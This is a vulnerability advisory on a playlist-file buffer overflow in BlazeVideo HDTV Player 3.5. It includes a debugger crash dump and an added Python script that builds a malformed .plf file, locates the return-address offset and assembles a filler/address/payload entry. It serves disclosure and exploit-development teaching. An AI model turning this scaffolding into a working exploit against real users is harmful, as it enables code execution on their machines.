BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Buffer Overflow Exploit

Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Buffer Overflow Exploit
Advisory ID: ZSL-2009-4906
Type: Local/Remote
Impact: System Access
Risk: (3/5)
Release Date: 04.02.2009
Summary
BlazeVideo HDTV Player (BlazeDTV) is a full-featured, easy-to-use HDTV player that combines HDTV playback, FM reception, video recording and DVD playback. It takes advantage of the PC monitor's high resolution to watch, record and play back high-definition HDTV programs or teletext broadcasts.
Description
BlazeVideo HDTV Player does not bound-check the entries it reads from a .plf playlist file. An overlong entry overruns a fixed-size buffer and overwrites control data, so a user who opens a crafted playlist (received by e-mail or downloaded from a web page, hence Local/Remote) can be made to execute attacker-supplied code in the context of the player, or the player simply crashes (denial of service). The original text classifies the flaw as heap-based, but the WinDbg output below shows EIP overwritten with 0x43434343, the bytes "CCCC" copied straight from the file, which is the signature of a stack-based overflow of a saved return address; CVE-2009-0450 (reference [7]) also records it as stack-based.

--------------------------------------------------------------------------------

(620.d74): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001
eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
43434343 ?? ???

--------------------------------------------------------------------------------
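The following script is an added example for this advisory and is not ZSL's PoC (blazehdtv_hof.py). It shows the two steps a practitioner performs on a crash like the one above: generate a playlist whose entry is a cyclic pattern so that the value landing in EIP identifies its offset in the file, and parse the debugger's register line to map that value back. It assumes, since the advisory does not say, that a .plf playlist is a text file with one media path per line; the offset of the return-address slot and any return address passed to build_entry() are placeholders the reader must determine, not values from the advisory.

```python
#!/usr/bin/env python3
"""Added example for this advisory; it is not ZSL's PoC (blazehdtv_hof.py).

Builds a malformed .plf playlist whose single entry is a cyclic pattern, and
maps the EIP value reported by the debugger back to an offset in that entry.

Assumptions (not stated in the advisory):
  * a .plf playlist is treated as a text file with one media path per line;
  * the offset at which the entry overwrites the return address is unknown,
    so a cyclic pattern is used to locate it;
  * any return address passed to build_entry() is a placeholder chosen by the
    reader, not a value from the advisory.
"""
import re
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
PERIOD = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique
    within the first PERIOD bytes, so a crash value identifies its offset."""
    if length > PERIOD:
        raise ValueError("pattern would repeat beyond %d bytes" % PERIOD)
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def parse_eip(register_line):
    """Pull the 32-bit EIP out of a WinDbg register line such as
    'eip=43434343 esp=0013f288 ...'; returns None if there is no eip= field."""
    m = re.search(r"\beip=([0-9a-fA-F]{8})", register_line)
    return int(m.group(1), 16) if m else None


def eip_bytes(eip):
    """Bytes that overwrote EIP, in the order they appear in the file
    (x86 is little-endian, so 0x43434343 came from b'CCCC')."""
    return struct.pack("<I", eip)


def pattern_offset(pattern, eip):
    """Offset of the 4 bytes that landed in EIP, or -1 if EIP did not come
    from the pattern (e.g. the pointer was corrupted somewhere else)."""
    return pattern.find(eip_bytes(eip).decode("latin-1"))


def build_entry(offset, ret_addr, payload, filler=b"C"):
    """Lay out one playlist entry: filler up to the return-address slot, the
    address (little-endian), then the payload. ret_addr is a placeholder."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    return filler * offset + struct.pack("<I", ret_addr) + payload


def build_plf(entry):
    """Serialise the entry as a one-line playlist (assumed format)."""
    if isinstance(entry, str):
        entry = entry.encode("latin-1")
    return entry + b"\r\n"


if __name__ == "__main__":
    # Stage 1: write a pattern playlist, open it in the player under a
    # debugger, and read eip= from the access-violation report.
    with open("pattern.plf", "wb") as f:
        f.write(build_plf(cyclic_pattern(4000)))

    # Stage 2: feed that register line back in to get the offset.  The line
    # below is the one printed in the advisory; 'CCCC' is not in the pattern,
    # so it reports -1, while a real pattern crash gives the exact offset.
    crash = "eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc"
    eip = parse_eip(crash)
    print("EIP %08x came from bytes %r, pattern offset %d"
          % (eip, eip_bytes(eip), pattern_offset(cyclic_pattern(4000), eip)))
```

Once pattern_offset() reports the slot, build_entry(offset, ret_addr, payload) produces the entry in the layout the title's "Exploit" implies (filler, overwritten return address, payload); choosing a usable return address and payload for the tested platform is left to the reader, as the advisory gives neither.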

Vendor
BlazeVideo, Inc. - http://www.blazevideo.com
Affected Version
3.5
Tested On
Microsoft Windows XP Professional SP2 (English)
Vendor Status
N/A
PoC
blazehdtv_hof.py
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] http://www.securityfocus.com/bid/33588
[2] http://www.packetstormsecurity.org/filedesc/blazehdtv-hof.txt.html
[3] http://www.milw0rm.com/exploits/7975
[4] http://www.hackzone.ru/exploit/view/id/4597/
[5] http://www.exploit-db.com/exploits/7975/
[6] http://osvdb.org/show/osvdb/51825
[7] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0450
Changelog
[04.02.2009] - Initial release
[19.07.2012] - Added reference [5], [6] and [7]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk